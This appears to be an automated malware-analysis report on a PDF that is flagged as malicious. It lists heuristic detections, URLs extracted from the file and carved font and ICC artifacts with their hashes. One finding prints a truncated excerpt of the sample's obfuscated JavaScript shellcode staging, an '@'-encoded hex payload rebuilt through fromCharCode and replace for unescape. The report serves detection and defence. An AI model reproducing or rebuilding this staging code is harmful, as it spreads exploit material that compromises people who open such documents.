MALICIOUS
86
Risk Score
Machine Learning
- Nyx PDF Classifier suspicious score 0.4319
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var forme1 = "@2deb@8358@04c0@c933@088b@9090@3390@33f6@8bff@83f0@0cc6@fe8b@3366@66d2@168b@d632@1788@c683@8302@01c7@e983@e301@eb17@e8e9@ffce@ffff@9090@9090@150b@0005@9090@9090@9090@9090@d184@71fa@fd11@30b1@26ca@3a3a@5d55@7a7a@1212@1175@04a5@c7f7@eaea@0707@4c4c@5dd6@0646@c8c4@e962@1c6c@a0bc@1eb3@56dd@7737@030b@cf46@4207@c73b@dd56@cd1d@bb30@7a38@4e72@6ee5@104c@ccce@c5bd@6467@d40e@129b@96cb@f60e@9e15@0942@9880@d853@7d26@af8f@b8bb@ef35@e3aa@0a81@685c@840f@7073@e095@778b@ae16@7b3c@9ffa@5e2a@90c0@93aa@ … var asT = String.fromCharCode(37,117); var forme2 = forme1.replace(/@/g,asT); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.monotype.comMonotype Referenced by PDF JavaScript
- http://www.foxitsoftware.comReferenced by PDF JavaScript
- http://www.monotype.com/html/mtname/ms_timesnewroman.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
- http://www.microsoft.com/truetype/fonts/wingdings/http://www.microsoft.com/truetype/designers/bandh/Referenced by PDF JavaScript
- http://www.monotype.com/html/mtname/ms_arial.htmlhttp://www.monotype.com/html/mtname/ms_welcome.htmlhttp://www.monotype.com/html/type/license.htmlReferenced by PDF JavaScript
- http://www.iec.chIn PDF document text
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
icc_00_off000000b2.icc |
pdf-icc-profile | PDF ICC profile at offset 0xB2 | 3144 bytes |
SHA-256: 2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e |
|||
font_00_sfnt_off00000c2b.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xC2B | 34872 bytes |
SHA-256: 83831dd521463c628ccf5326b2691f9f9e831e8babc26932321a4a5f7124936e |
|||
font_01_sfnt_off000065d1.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x65D1 | 52748 bytes |
SHA-256: f27c297b9da0fead241168e20fba12b6892f2a4a6ac5a1901a54f733a4b106cc |
|||
font_02_sfnt_off0000f28d.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0xF28D | 9696 bytes |
SHA-256: c869b49ceacdf99ae46dab3f76366706417a1d101856a104145e0440ad292ba1 |
|||
font_03_sfnt_off00010695.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x10695 | 13336 bytes |
SHA-256: 7d830b325f869950ddfd01daa675f402578dd99a87d67862120e347535416ab7 |
|||
font_04_sfnt_off000123b3.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x123B3 | 29592 bytes |
SHA-256: 3fa2cf1f95426906a95a6a9761c7eb9385ce6c6c5aaac164bd1e6da2fb1c9e67 |
|||
font_05_sfnt_off00018263.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x18263 | 15484 bytes |
SHA-256: f17dc23034f5d7335316bcceb62cc449fc05a4fcee4619c6dffc237c268b5f2e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.